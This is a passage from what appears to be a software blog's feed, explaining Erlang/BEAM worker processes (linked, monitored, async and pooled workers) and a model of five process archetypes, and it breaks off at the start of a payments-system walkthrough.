&lt;p&gt;If the Worker crashes, only that one job is affected. The caller can in
turn time out, retry, or as in the example log a failure. No other state is
corrupted. The village shrugs and hires another gnome.&lt;/p&gt;
&lt;p&gt;In this version you don’t see the crash reason unless you log it somewhere
else.&lt;/p&gt;
&lt;p&gt;Now a &lt;strong&gt;linked&lt;/strong&gt; version, where the default behaviour is:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“If the worker dies, I die too.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the pure YBYOYR flavour: if the worker blows up, the caller is probably in a bad state as well.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_do_link_or_crash(Fun, Input, Timeout) -&amp;gt;
    Caller = self(),
    Ref = make_ref(),
    Worker = spawn_link(fun() -&amp;gt;
        Result = Fun(Input),
        Caller ! {self(), Ref, Result}
    end),
    receive
        {Worker, Ref, Result} -&amp;gt;
            Result
    after Timeout -&amp;gt;
            exit({timeout, Worker, Input})
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If &lt;code&gt;Fun(Input)&lt;/code&gt; raises an exception, the Worker exits abnormally.&lt;/li&gt;
&lt;li&gt;Because of &lt;code&gt;spawn_link/1&lt;/code&gt;, the caller gets an &lt;code&gt;&#39;EXIT&#39;&lt;/code&gt; signal and dies too.&lt;/li&gt;
&lt;li&gt;You either get a &lt;code&gt;Result&lt;/code&gt; or your process crashes and lets a supervisor
deal with it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is the &lt;strong&gt;simplest linked worker&lt;/strong&gt;: either success or crash. No middle
ground.&lt;/p&gt;
&lt;h3 id=&quot;handling-worker-crashes-without-dying&quot; tabindex=&quot;-1&quot;&gt;Handling worker crashes without dying&lt;/h3&gt;
&lt;p&gt;If you want to catch worker failures &lt;strong&gt;without linking lifetimes&lt;/strong&gt; and
without turning your process into an accidental supervisor, use
&lt;strong&gt;&lt;code&gt;spawn_monitor&lt;/code&gt;&lt;/strong&gt;. It gives you a &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; message on crash, and it never
kills the caller.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_do_monitor(Fun, Input, Timeout) -&amp;gt;
    Caller = self(),
    {Worker, MonRef} =
        spawn_monitor(fun() -&amp;gt;
            Result = Fun(Input),
            Caller ! {self(), {ok, Result}}
        end),
    receive
        {Worker, {ok, Result}} -&amp;gt;
            {ok, Result};
        {&#39;DOWN&#39;, MonRef, process, Worker, Reason} -&amp;gt;
            {error, {worker_crashed, Reason}}
    after Timeout -&amp;gt;
            {error, {timeout, Worker, Input}}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Notes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;On success we get &lt;code&gt;{ok, Result}&lt;/code&gt; directly from the worker.&lt;/li&gt;
&lt;li&gt;If the worker crashes we receive a &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; message with the reason.&lt;/li&gt;
&lt;li&gt;On timeout we return &lt;code&gt;{error, {timeout, Worker, Input}}&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;spawn_monitor&lt;/code&gt; is a good default when you want robust workers but don’t
want to tie your fate to theirs. It gives you explicit crash information
without the subtle semantics of links or the global side-effects of
&lt;code&gt;trap_exit&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In many cases, this is the simplest and safest synchronous worker pattern
to drop into production.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;asynchronous-workers-fire-and-forget-asyncawait&quot; tabindex=&quot;-1&quot;&gt;Asynchronous workers: fire-and-forget + async/await&lt;/h2&gt;
&lt;p&gt;Next step: separate &lt;strong&gt;starting the worker&lt;/strong&gt; from &lt;strong&gt;waiting for the result&lt;/strong&gt;.&lt;/p&gt;
&lt;h3 id=&quot;fire-and-forget&quot; tabindex=&quot;-1&quot;&gt;Fire and forget&lt;/h3&gt;
&lt;p&gt;The most basic async worker:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;fire_and_forget(Fun, Input) -&amp;gt;
    _Pid = spawn(fun() -&amp;gt; Fun(Input) end),
    ok.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You don’t know if it succeeds. You don’t know when. Sometimes that is fine
(e.g. “best-effort” metrics, logging to a third-party system). Often it’s
not.&lt;/p&gt;
&lt;h3 id=&quot;async-handle-start-now-await-later&quot; tabindex=&quot;-1&quot;&gt;Async handle: start now, await later&lt;/h3&gt;
&lt;p&gt;Better: return a handle &lt;code&gt;{Pid, Ref}&lt;/code&gt; and let the caller decide when (or if)
to wait.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_async_start(Fun, Input) -&amp;gt;
    Caller = self(),
    Ref = make_ref(),
    Pid = spawn(fun() -&amp;gt;
        Result = Fun(Input),
        Caller ! {self(), Ref, {ok, Result}}
    end),
    {Pid, Ref}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To wait for it:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_async_await({Pid, Ref}, Timeout) -&amp;gt;
    receive
        {Pid, Ref, {ok, Result}} -&amp;gt;
            {ok, Result}
    after Timeout -&amp;gt;
            {error, {timeout, Pid}}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This gives you:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A &lt;strong&gt;non-blocking&lt;/strong&gt; call to start work.&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;separate&lt;/strong&gt; blocking call to await, with its own timeout.&lt;/li&gt;
&lt;li&gt;Freedom to stash the handle in state, pass it to another process, or
ignore it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can obviously extend this to handle crashes by using &lt;code&gt;spawn_monitor/1&lt;/code&gt;
instead of &lt;code&gt;spawn/1&lt;/code&gt; and handling &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; messages, but that’s the same
pattern with one extra branch.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;parallelism-workers-as-fan-outfan-in&quot; tabindex=&quot;-1&quot;&gt;Parallelism: workers as fan-out/fan-in&lt;/h2&gt;
&lt;p&gt;Now the fun part: use Workers to process &lt;strong&gt;parts of a problem in parallel&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Imagine a simple &lt;code&gt;pmap/2&lt;/code&gt; (parallel map):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;pmap(Fun, List) -&amp;gt;
    Caller = self(),
    % Start one worker per item
    Pids = [spawn(fun() -&amp;gt;
                      Result = Fun(X),
                      Caller ! {self(), Result}
                  end)
            || X &amp;lt;- List],
    collect_results(Pids, []).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;collect_results/2&lt;/code&gt; can be:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;collect_results([], Acc) -&amp;gt;
    lists:reverse(Acc);
collect_results([Pid | Rest], Acc) -&amp;gt;
    receive
        {Pid, Result} -&amp;gt;
            collect_results(Rest, [Result | Acc])
    after 5000 -&amp;gt;
            exit({timeout_waiting_for, Pid})
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Properties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;One worker per element&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Each worker replies with &lt;code&gt;{Pid, Result}&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Results are collected in the same order as the original list, because we
walk the &lt;code&gt;Pids&lt;/code&gt; list in order.&lt;/li&gt;
&lt;li&gt;If the worker for a given &lt;code&gt;Pid&lt;/code&gt; is slow or stuck, we block there and
earlier results from other workers will sit in the mailbox until we get
to their PID. That’s intentional: we are enforcing ordered results.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You’ve just implemented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Fan-out&lt;/strong&gt;: spawn a Worker per “chunk”.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fan-in&lt;/strong&gt;: collect results by &lt;code&gt;Pid&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Clear fault model: each Worker is semi independent; one crash doesn’t
poison others, but we lose the result.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can refine this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ignore timed-out results, and later drain the mailbox to get rid of late
replies.&lt;/li&gt;
&lt;li&gt;Ignore the result entirely if the only thing you care about is the side
effect (for example, sending an email).&lt;/li&gt;
&lt;li&gt;Chunk the list (e.g. 100 items per Worker) if the list is huge.&lt;/li&gt;
&lt;li&gt;Use a fixed-size pool instead of unbounded spawns if external resources
are involved. We will look at pooled workers soon.&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;spawn_link&lt;/code&gt; or &lt;code&gt;spawn_monitor&lt;/code&gt; for stricter crash semantics and
better visibility into failures.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;p&gt;Short-lived Workers align perfectly with the BEAM’s strengths. Processes
are cheap to spawn and cheap to terminate. The scheduler is designed for
this. Concurrency is the default setting, not something you have to fight
for.&lt;/p&gt;
&lt;p&gt;The main way to misuse short-lived Workers is to spawn them without any
thought of &lt;strong&gt;rate&lt;/strong&gt;. If every incoming HTTP request spawns ten internal
Workers that talk to five different external services, you now have a
&lt;strong&gt;fan-out explosion&lt;/strong&gt; and a new surprise: your outbound traffic graph.&lt;/p&gt;
&lt;p&gt;Workers are cheap. External systems are not.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;when-a-worker-becomes-a-pool-member&quot; tabindex=&quot;-1&quot;&gt;When a Worker Becomes a Pool Member&lt;/h2&gt;
&lt;p&gt;Sometimes “spawn as many as you like” is not the right choice. You may
have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A database that only handles 50 concurrent connections without melting.&lt;/li&gt;
&lt;li&gt;An external API with strict rate limits.&lt;/li&gt;
&lt;li&gt;A crypto context or GPU handle that is too expensive to recreate for
every job.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In these cases you want &lt;strong&gt;many callers&lt;/strong&gt;, but &lt;strong&gt;only a controlled number of
Workers running at the same time&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;That is all a Worker pool is.&lt;/p&gt;
&lt;p&gt;The BEAM ecosystem has several reliable implementations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;poolboy&lt;/strong&gt;: the classic Erlang pool, battle-tested for a decade.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;pooler&lt;/strong&gt; and &lt;strong&gt;poolgirl&lt;/strong&gt;: Erlang alternatives with different
trade-offs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Poolex&lt;/strong&gt;, &lt;strong&gt;worker_pool&lt;/strong&gt;, and others on the Elixir side.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All of them follow the same idea:&lt;/p&gt;
&lt;p&gt;You have a &lt;em&gt;fixed number of Workers&lt;/em&gt;, and callers borrow one Worker at a
time to perform a job.&lt;/p&gt;
&lt;p&gt;A poolboy-style call looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;poolboy:transaction(MyPool, fun(WorkerPid) -&amp;gt;
    gen_server:call(WorkerPid, {do, Job})
end).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Callers never talk to the Worker directly. They talk to the &lt;strong&gt;pool&lt;/strong&gt;, and
the pool manages who gets to run work next.&lt;/p&gt;
&lt;p&gt;The reason for this setup is simple: &lt;strong&gt;limit concurrency&lt;/strong&gt; around a scarce
resource.&lt;/p&gt;
&lt;p&gt;The Worker archetype stays the same. It still does &lt;strong&gt;one job at a time&lt;/strong&gt;.
The only difference is that some Workers are now part of a coordinated
“team” rather than being spawned freely.&lt;/p&gt;
&lt;p&gt;If the Worker crashes while doing a job, supervision restarts it and the
Worker returns to the pool. The pool continues to behave exactly the same,
which is why people like it.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;a-note-about-hybrids-but-were-not-going-there-yet&quot; tabindex=&quot;-1&quot;&gt;A Note About Hybrids (But We’re Not Going There Yet)&lt;/h2&gt;
&lt;p&gt;Sometimes a pooled Worker also holds a long-lived resource (like a DB
connection). That means it is &lt;em&gt;also&lt;/em&gt; a kind of Resource Owner.&lt;/p&gt;
&lt;p&gt;This is one of the few valid cases where an archetype can be “mixed”, and
we’ll talk about it later when we get to resource owners.&lt;/p&gt;
&lt;p&gt;For now, keep Worker pools conceptually simple:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;They exist to limit concurrency.
All the Worker does is: &lt;strong&gt;one job at a time&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We’ll revisit the “Workers that hold state” pattern in the upcoming
&lt;strong&gt;Resource Owner&lt;/strong&gt; post.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;when-not-to-pool-workers&quot; tabindex=&quot;-1&quot;&gt;When &lt;em&gt;not&lt;/em&gt; to pool Workers&lt;/h1&gt;
&lt;p&gt;People see Worker pools and get excited. They then start pooling
everything.&lt;/p&gt;
&lt;p&gt;Do not pool CPU-bound Workers that use only local state. The BEAM is
already a giant dynamic pool with preemptive scheduling and excellent
fairness. Adding a pool on top usually adds serialization and queueing
where you don’t need it.&lt;/p&gt;
&lt;p&gt;A few simple rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If the Worker only touches &lt;strong&gt;local memory&lt;/strong&gt; and pure CPU, you probably do
&lt;strong&gt;not&lt;/strong&gt; need a pool. Just spawn as needed.&lt;/li&gt;
&lt;li&gt;If the Worker wraps a &lt;strong&gt;scarce external resource&lt;/strong&gt; (DB connection, API
client, file descriptor), a pool is probably a good idea.&lt;/li&gt;
&lt;li&gt;If you have a performance problem and your first instinct is “add a
pool”, check your external dependencies and message rates first.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Worker pool is not a performance tool. It is a &lt;strong&gt;safety tool&lt;/strong&gt; to avoid
exhausting external resources. If you turn it into a global throttle for
all work, you will get exactly that: a global throttle.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;routing-versus-checkout-pools&quot; tabindex=&quot;-1&quot;&gt;Routing versus checkout pools&lt;/h1&gt;
&lt;p&gt;There are two broad ways to structure pooled Workers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Checkout pools&lt;/strong&gt; are what poolboy does. Callers ask the pool for a
Worker, use it, and return it when done. This makes sense for blocking
flows with exclusive use of a resource, like a DB connection.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Routing pools&lt;/strong&gt; are different. Callers never see individual Workers. They
send messages to a Router, which distributes work across Workers. Andrea
Leopardi’s post on process pools with Elixir’s &lt;code&gt;Registry&lt;/code&gt; is a good example
of this style. &lt;a href=&quot;https://andrealeopardi.com/posts/process-pools-with-elixirs-registry/?utm_source=chatgpt.com&quot;&gt;&amp;quot;Process pools with Elixir&#39;s Registry&amp;quot;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;For the Worker archetype, both styles are still Workers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In a checkout pool, the Worker is checked out, does one job, returns to
idle.&lt;/li&gt;
&lt;li&gt;In a routing pool, the Worker receives jobs via messages, does one at a
time, and stays alive.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The choice is about &lt;strong&gt;how callers coordinate&lt;/strong&gt;, not about what the Worker
is.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;failure-cheap-and-local&quot; tabindex=&quot;-1&quot;&gt;Failure: cheap and local&lt;/h1&gt;
&lt;p&gt;A short-lived Worker that crashes is easy to reason about. You get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;One failed job.&lt;/li&gt;
&lt;li&gt;A stacktrace.&lt;/li&gt;
&lt;li&gt;No lingering state.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A pooled Worker that crashes is also manageable, as long as supervision is
correct. A Supervisor can restart the Worker with a fresh connection. The
pool continues to function.&lt;/p&gt;
&lt;p&gt;The problems start when you accidentally promote the Worker into a &lt;strong&gt;God
process&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It now keeps global state.&lt;/li&gt;
&lt;li&gt;It routes messages.&lt;/li&gt;
&lt;li&gt;It logs.&lt;/li&gt;
&lt;li&gt;It supervises others.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At that point, when it crashes, your system has an existential crisis
instead of a minor incident.&lt;/p&gt;
&lt;p&gt;A Worker should &lt;strong&gt;never&lt;/strong&gt; supervise, route, or own global state. It should
&lt;em&gt;work&lt;/em&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;how-this-maps-to-javas-new-toys&quot; tabindex=&quot;-1&quot;&gt;How this maps to Java’s new toys&lt;/h1&gt;
&lt;p&gt;Java has finally discovered that threads don’t need to weigh as much as
small cars. With Project Loom and structured concurrency you now get
&lt;strong&gt;virtual threads&lt;/strong&gt; and &lt;strong&gt;task scopes&lt;/strong&gt;: lighter, cheaper, and with a
lifespan you can reason about. On a good day they even feel a little like
BEAM processes.&lt;/p&gt;
&lt;p&gt;It’s tempting to say: “Ah, Java threads have become Erlang processes.”&lt;/p&gt;
&lt;p&gt;They haven’t. They’ve just stopped being quite as heavy.&lt;/p&gt;
&lt;p&gt;A few reminders:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Virtual threads still share mutable state unless you fight very hard not
to.&lt;/li&gt;
&lt;li&gt;Failure propagation and restart strategies are still something you build
yourself. (In Erlang the supervisor is a library too, but the
&lt;em&gt;primitives&lt;/em&gt; it relies on, links, monitors, exit signals, are baked
into the VM.)&lt;/li&gt;
&lt;li&gt;There is no mailbox. If you want asynchronous message passing, you
assemble it from queues and hope for the best.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So yes, you can implement the Worker archetype in Java now without hurting
yourself. But you must &lt;strong&gt;decide&lt;/strong&gt; to structure it that way.&lt;/p&gt;
&lt;p&gt;On the BEAM, you must work equally hard to avoid doing it that way.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;about-naming-workers&quot; tabindex=&quot;-1&quot;&gt;About naming Workers&lt;/h1&gt;
&lt;p&gt;OTP 27 added something useful: &lt;strong&gt;process labels&lt;/strong&gt; via
&lt;code&gt;proc_lib:set_label/1&lt;/code&gt;. This lets you attach a descriptive term to any
process that does &lt;em&gt;not&lt;/em&gt; have a registered name. Tools like &lt;code&gt;c:i/0&lt;/code&gt;,
&lt;code&gt;observer&lt;/code&gt;, and crash reports can show this label.&lt;/p&gt;
&lt;p&gt;So you can think of it this way:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Registered name&lt;/strong&gt;: a real name used for lookup and messaging
(&lt;code&gt;register(Name, Pid)&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Label&lt;/strong&gt;: a descriptive tag for humans and tools; not used for routing
or lookup.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For Workers, this means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You still normally don’t give them global names.&lt;/li&gt;
&lt;li&gt;When you do want visibility in tools, add a &lt;strong&gt;label&lt;/strong&gt;, not a global name.&lt;/li&gt;
&lt;li&gt;Pooled Workers are typically anonymous processes with labels and are discovered through the pool, not directly.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;takeaways&quot; tabindex=&quot;-1&quot;&gt;Takeaways&lt;/h1&gt;
&lt;p&gt;A Worker is the simplest and most honest process archetype:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Short-lived Workers: one job, then exit.&lt;/li&gt;
&lt;li&gt;Pooled Workers: one job at a time, reuse scarce resources.&lt;/li&gt;
&lt;li&gt;No routing. No supervision. No global state.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The BEAM makes this style of concurrency both natural and cheap. External
systems do not.&lt;/p&gt;
&lt;p&gt;In following posts, we will look at the other villagers: &lt;strong&gt;Resource owners,
Routers, Gatekeepers, and Observers&lt;/strong&gt;. Together they give you enough
vocabulary to design systems with many processes that still behave like
adults.&lt;/p&gt;
&lt;p&gt;One archetype per role. One role per process. Sleep improves dramatically
after that.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Process Archetypes: The Roles in the Gnome Village</title>
    <link href="https://happihacking.com/blog/posts/2025/process_archetypes/"/>
    <updated>2025-11-21T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/process_archetypes/</id>
    <summary>Every process has a job. Problems start when it has two.</summary>
    <content type="html">&lt;h1 id=&quot;process-archetypes-the-roles-in-the-gnome-village&quot; tabindex=&quot;-1&quot;&gt;Process Archetypes: The Roles in the Gnome Village&lt;/h1&gt;
&lt;p&gt;The BEAM makes it easy to create thousands of processes. This is powerful,
but only if you give each process a clear role. A process without a role
becomes a small, confused god-object with a mailbox. Eventually it grows a
personality disorder.&lt;/p&gt;
&lt;p&gt;To avoid this fate, I use a simple model of &lt;strong&gt;five archetypes&lt;/strong&gt;. Every
process in a BEAM system fits one of them. If it doesn’t, it is probably
doing too much.&lt;/p&gt;
&lt;p&gt;The archetypes are not design patterns. They are behavioural roles. Think
of them as job descriptions for the gnomes in &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;the village&lt;/a&gt;. (I first outlined these categories in &lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrent Systems on the BEAM&lt;/a&gt;; this series goes deeper.)&lt;/p&gt;
&lt;p&gt;The roles are simple:
&lt;strong&gt;Workers do work. Resource owners keep state. Routers decide. Gatekeepers protect. Observers watch.&lt;/strong&gt;
That is the entire system. You can stop reading now.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;workers&quot; tabindex=&quot;-1&quot;&gt;Workers&lt;/h1&gt;
&lt;p&gt;A Worker handles exactly one task. It does the job, reports back, and
disappears. The disappearing part is important. It keeps the world tidy.&lt;/p&gt;
&lt;p&gt;Workers are the default choice when you need parallelism or simple
isolation. Spawn one, give it a message, and let it finish. If it crashes,
only one piece of work is lost. That is usually acceptable. If it isn’t,
the Worker should not be doing that job.&lt;/p&gt;
&lt;p&gt;Some Workers live in pools. These Workers might keep some configuration
between jobs. They still perform one job at a time, but they do not vanish
afterwards. They sit quietly until needed again. This is the polite version
of a thread-pool, without the traditional thread-pool problems.&lt;/p&gt;
&lt;p&gt;Workers embody the BEAM’s idea of cheap concurrency. You hire many, pay
them little, and expect them to fail occasionally.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;resource-owners&quot; tabindex=&quot;-1&quot;&gt;Resource Owners&lt;/h1&gt;
&lt;p&gt;A Resource Owner does one thing: it owns state. A cart, a user session, a
WebSocket, a payment intent. Anything that needs a clear owner becomes a
process.&lt;/p&gt;
&lt;p&gt;A Resource Owner serializes access by receiving one message at a time.
There are no locks, no strategies, and no passive-aggressive comments in
code reviews about “thread safety”. A Resource Owner is always thread-safe,
because it &lt;em&gt;is&lt;/em&gt; the thread.&lt;/p&gt;
&lt;p&gt;Aggregators are a subtype. They collect rolling data or maintain sliding
windows. Same principle, but more numbers.&lt;/p&gt;
&lt;p&gt;If the system relies on invariants, the Resource Owner is where those
invariants live. You do not put them in five layers of frameworks. You put
them in a process that owns the data. It is the simplest possible model,
which is why it works.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;routers&quot; tabindex=&quot;-1&quot;&gt;Routers&lt;/h1&gt;
&lt;p&gt;A Router never owns anything. It reads a message and forwards it to the
correct place. That is all.&lt;/p&gt;
&lt;p&gt;Sometimes the Router fans messages out (broadcaster). Sometimes it sends
them to a single target (director). In both cases it has no state and no
emotional attachments. A Router that remembers things, other than where to
send messages, has abandoned its post.&lt;/p&gt;
&lt;p&gt;Routers keep the architecture clean. If a Router becomes complicated, the
system design is wrong. If a Router starts holding state, the system design
is very wrong. This is usually how accidental bottlenecks begin.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;gatekeepers&quot; tabindex=&quot;-1&quot;&gt;Gatekeepers&lt;/h1&gt;
&lt;p&gt;A Gatekeeper protects something. It limits, delays, sequences, or blocks.
It exists because the outside world cannot be trusted.&lt;/p&gt;
&lt;p&gt;There are three common types:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Flow controllers&lt;/strong&gt; enforce ordering or stage boundaries.
&lt;strong&gt;Rate limiters&lt;/strong&gt; slow the producers down so you don’t melt your downstream systems.
&lt;strong&gt;Circuit breakers&lt;/strong&gt; give up early when something is clearly on fire.&lt;/p&gt;
&lt;p&gt;The Gatekeeper role is simple: let good messages through, keep bad messages
out, and contain the blast radius. Without Gatekeepers, a small outage
becomes a distributed festival of sadness.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;observers&quot; tabindex=&quot;-1&quot;&gt;Observers&lt;/h1&gt;
&lt;p&gt;Observers do not own state and do not do work. They watch other processes
and respond to conditions.&lt;/p&gt;
&lt;p&gt;Sentinels watch for overload, timeouts, and stalled flows. Supervisors
watch for death, restart children, and otherwise mind their own business.&lt;/p&gt;
&lt;p&gt;Supervisors are the managers of the village. They never bake bread or carry
logs. They only decide who should be restarted and when. A Supervisor that
does real work is a future incident waiting to happen.&lt;/p&gt;
&lt;p&gt;Observers tie the system together without touching the logic.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;why-roles-matter&quot; tabindex=&quot;-1&quot;&gt;Why Roles Matter&lt;/h1&gt;
&lt;p&gt;Most problems in process-oriented systems come from &lt;strong&gt;role confusion&lt;/strong&gt;. A
Resource Owner that tries to route requests becomes a bottleneck. A Router
that stores state becomes a single point of failure. A Worker that lives
too long becomes a Resource Owner by accident. A Supervisor that does real
work becomes your next 3 AM story.&lt;/p&gt;
&lt;p&gt;Clear roles reduce cognitive load. They make supervision trees predictable.
They make debugging obvious. When each process has one job, everything is
easier to trace, reason about, and restart.&lt;/p&gt;
&lt;p&gt;Good systems are built from small pieces with strong opinions about what
they do.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;looking-ahead&quot; tabindex=&quot;-1&quot;&gt;Looking Ahead&lt;/h1&gt;
&lt;p&gt;This post introduced the five archetypes. Next, I will walk through each
role in detail, with examples and the small mistakes that make big
problems.&lt;/p&gt;
&lt;p&gt;To make this practical, I’ll also publish a set of minimal examples in
Erlang, Elixir, and a few other languages. The BEAM versions will be small.
The non-BEAM versions will demonstrate why the BEAM versions are small.&lt;/p&gt;
&lt;p&gt;One archetype per post. One job per process. Life is easier that way.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Gnomes, Domains, and Flows: Putting It Together</title>
    <link href="https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/"/>
    <updated>2025-11-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/</id>
    <summary>From checklist to a running payments path</summary>
    <content type="html">&lt;p&gt;&lt;strong&gt;Glossary:&lt;/strong&gt; Resource owner = the process that owns mutable state for a domain object. Request owner = the process coordinating one user request end-to-end within a domain. Adapter = the boundary process that talks to an external system. Orchestration = the domain that coordinates multi-step work across other domains.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/water_and_sky.jpg&quot; alt=&quot;Calm system landscape&quot; title=&quot;Calm system landscape&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;recap-the-ingredients&quot; tabindex=&quot;-1&quot;&gt;Recap the ingredients&lt;/h1&gt;
&lt;p&gt;Domains keep code and data in their lanes. Flows choreograph how work crosses those lanes. Processes stay light: they read scrolls from the right domain, follow the flow contracts, and let supervisors restart them when needed. The easiest way to validate the frame is to walk through one production path and make sure every element has a deliberate owner.&lt;/p&gt;
&lt;img src=&quot;https://happihacking.com/images/ditaa/518144cac42fcf069c4ecac5eca7754a.svg&quot; alt=&quot;Diagram&quot; class=&quot;ditaa-diagram&quot; /&gt;
&lt;p&gt;The picture is simple: every box is its own OTP application with a supervision tree. The API validates, orchestration coordinates, the ledger owns truth, and adapters isolate external chaos.&lt;/p&gt;
&lt;p&gt;PSP = payment service provider (card processor). The adapter isolates that boundary so the rest of the system never sees its quirks.&lt;/p&gt;
&lt;h1 id=&quot;payments-path-walkthrough&quot; tabindex=&quot;-1&quot;&gt;Payments path walkthrough&lt;/h1&gt;
&lt;p&gt;Consider a simple “authorize card, log ledger entry, notify customer” workflow.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Call flow&lt;/strong&gt;: The API domain receives an HTTPS call. It runs synchronous validation, enforces a 200 ms budget, and passes a traced request into the orchestration domain.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Message flow&lt;/strong&gt;: The orchestrator sends commands to the payments domain (“authorize”), the ledger domain (“append entry”), and the notifications domain (“send receipt”). Each message carries a &lt;code&gt;trace_id&lt;/code&gt;, versioned payload, and retries with idempotency keys.&lt;/li&gt;
